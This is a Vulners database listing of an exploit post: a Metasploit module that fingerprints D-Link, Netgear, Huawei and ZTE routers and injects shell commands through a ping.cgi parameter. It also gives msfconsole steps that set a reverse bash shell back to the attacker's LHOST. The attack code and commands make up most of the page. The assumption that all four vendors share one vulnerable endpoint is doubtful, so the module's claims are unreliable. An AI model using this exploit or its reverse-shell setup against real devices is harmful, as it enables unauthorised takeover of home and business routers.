Vulners
Lucene search
📄 Router Fingerprint / Command Injection Scanner
=============================================================================================================================================
| # Title : IoT Router Auto Fingerprint Command Injection Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : indoushka |
=============================================================================================================================================
[+] Summary : This Metasploit module targets multiple IoT routers by automatically fingerprinting the device vendor and attempting to exploit command injection vulnerabilities.
The module sends an HTTP request to identify the router manufacturer by analyzing response headers and page content. Once the vendor is detected (such as D-Link, Netgear, Huawei, or ZTE),
it dynamically selects an appropriate command injection payload format tailored to the specific firmware behavior. The exploit then delivers the payload through a vulnerable CGI endpoint (ping.cgi),
enabling remote command execution on Linux-based router systems.
The module is designed for automated exploitation across different router brands using a single adaptive attack workflow.
[+] POC : modules/exploits/linux/http/iot_indoushka_rce.rb
msfconsole
reload_all
use exploit/linux/http/iot_indoushka_rce
set RHOSTS TARGET_IP
set RPORT 80
set LHOST YOUR_IP
set payload cmd/unix/reverse_bash
run
##
# IoT Multi Router Auto Fingerprint RCE
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'IoT Router Auto Fingerprint Command Injection',
'Description' => %q{
This module attempts to fingerprint router vendors automatically
and trigger command injection vulnerabilities in several IoT routers.
},
'Author' =>
[
'indoushka'
],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Automatic', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2025-01-01'))
register_options(
[
Opt::RHOST(),
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def fingerprint
res = send_request_cgi({
'uri' => '/'
})
return "Unknown" if res.nil?
body = res.body.downcase
headers = res.headers.to_s.downcase
if body.include?("d-link") || headers.include?("d-link")
return "D-Link"
end
if body.include?("netgear") || headers.include?("netgear")
return "Netgear"
end
if body.include?("huawei") || headers.include?("huawei")
return "Huawei"
end
if body.include?("zte") || headers.include?("zte")
return "ZTE"
end
return "Unknown"
end
def payload_for(vendor)
case vendor
when "D-Link"
return ";#{payload.encoded}"
when "Netgear"
return "`#{payload.encoded}`"
when "Huawei"
return "|#{payload.encoded}"
when "ZTE"
return ";#{payload.encoded}"
else
return ";#{payload.encoded}"
end
end
def exploit
print_status("Fingerprinting router...")
vendor = fingerprint
print_good("Detected Vendor: #{vendor}")
cmd = payload_for(vendor)
print_status("Sending payload...")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, "cgi-bin", "ping.cgi"),
'vars_get' =>
{
'ip' => cmd
}
})
print_good("Payload sent")
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8